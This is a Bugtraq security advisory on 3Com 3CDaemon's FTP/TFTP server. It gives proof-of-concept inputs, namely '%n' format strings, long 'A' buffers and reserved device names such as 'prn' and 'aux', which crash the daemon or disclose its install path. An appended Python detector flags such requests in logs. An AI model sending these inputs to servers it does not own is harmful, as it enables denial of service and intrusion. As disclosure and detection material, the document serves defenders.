Bugtraq mailing list archives


3Com 3CDaemon Multiple Vulnerabilities


From: "Sowhat ." <smaillist () gmail com>
Date: Tue, 4 Jan 2005 18:23:06 +0800

3Com 3CDaemon Multiple Vulnerabilities

By Sowhat
04.JAN.2005
http://secway.org/advisory/ad20041011.txt
[I.T.S] Security Research Team

Product Affected:
3Com 3CDaemon 2.0 revision 10

Vendor:
www.3Com.com

(1) BACKGROUND

3CDaemon is a free popular TFTP, FTP, and Syslog daemon for Microsoft Windows platforms, developed by dan_gill@3Com.

For more information,
http://support.3com.com/software/utilities_for_windows_32_bit.htm
ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip

3CDaemon is full of holes. ISS and Wang Ning <nwang () scn com cn> have already reported some bugz about 3CDaemon
(see:
http://xforce.iss.net/xforce/xfdb/8970
http://www.securityfocus.org/bid/11944)
And I document some other well-known bugz here again :)

(2) Details

Remote exploitation of multiple vulnerabilities in the 3CDaemon allows attackers to execute arbitrary commands as the user running 3CDaemon (usually Administrator).
Some of these vulnerabilities didn't need a valid username and password to login.

There are several vulnerabilities:

1. TFTP Reserved Device Name Denial of Service

D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn

The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".

2. FTP Username Format String vulnerability

H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.

OR:

H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>

And then the 3CDaemon is dead.

3. FTP long Username Buffer overflow

D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.

4. Multiple FTP command long parameter Buffer overflow

Including:
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD, and so on
(Maybe this is what ISS's Advisory is talking about)

ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>

ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.

ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.

It seems that the length of the "A" is different for every command.

5. Multiple FTP command Format string

Including:
cd,delete,rename,rmdir,literal,stat,CWD, and so on

230 User logged in
ftp> cd %n
Connection closed by remote host.
ftp>

6. Multiple FTP command Reserved Device Name Information Leak

Including cd, and so on

The following commands will disclose the physical path of the 3cdaemon:

ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!

And also, CD to an existing filename will disclose the physical path too.

ftp> cd toolz.rar
550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!

There are still some other boring bugz, but it's enough : >

(3) WORKAROUND

Workaround?
No......

(4) Vendor Response

Since it seems that 3com hasn't maintained 3CDaemon for a long long time, I didn't contact them :)

http://secway.org
Thanks to all the members of ITS Security Team
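A defender's view of the six issues above, as an added example that is not part of the original advisory: a Python check that flags FTP/TFTP request lines carrying a printf-style specifier, a Windows reserved device name, or an over-long argument. The "VERB argument" log format, the 200-byte threshold, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Windows reserved device names, bare or with an extension ("prn", "aux.txt").
RESERVED = re.compile(r"^(con|prn|aux|nul|com[1-9]|lpt[1-9])(\..*)?$", re.I)
# printf-style conversion such as %n, %s or %08x.
FORMAT_SPEC = re.compile(r"%[-+ #0]*\d*(\.\d+)?(hh|h|ll|l)?[diouxXeEfgGcspn]")
MAX_ARG = 200  # assumed threshold, below the ~241-byte USER case above


def classify(line):
    """Return sorted findings for one 'VERB argument' request line."""
    _verb, _, arg = line.strip().partition(" ")
    findings = set()
    if len(arg) > MAX_ARG:
        findings.add("long-argument")
    if FORMAT_SPEC.search(arg):
        findings.add("format-specifier")
    # Test every path component so "pub/lpt1" and "dir\\aux.txt" are caught;
    # Windows ignores trailing dots and spaces, so strip them first.
    for part in re.split(r"[\\/]", arg):
        if RESERVED.match(part.rstrip(" .")):
            findings.add("reserved-device-name")
    return sorted(findings)


def scan(lines):
    """Return (line prefix, findings) for every line that was flagged."""
    return [(l[:40], f) for l in lines if (f := classify(l))]


# Constructed sample request log (not captured traffic).
SAMPLE = [
    "USER anonymous",
    "USER %n",
    "USER " + "A" * 241,
    "CWD aux",
    "CWD pub/lpt1",
    "CWD %s",
    "RRQ prn",
    "RETR readme.txt",
]

if __name__ == "__main__":
    for prefix, findings in scan(SAMPLE):
        print(f"{prefix!r}: {', '.join(findings)}")
```

The same three predicates can sit in front of a legacy daemon as a filtering proxy rule or run over existing request logs to find hosts probing for these conditions.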
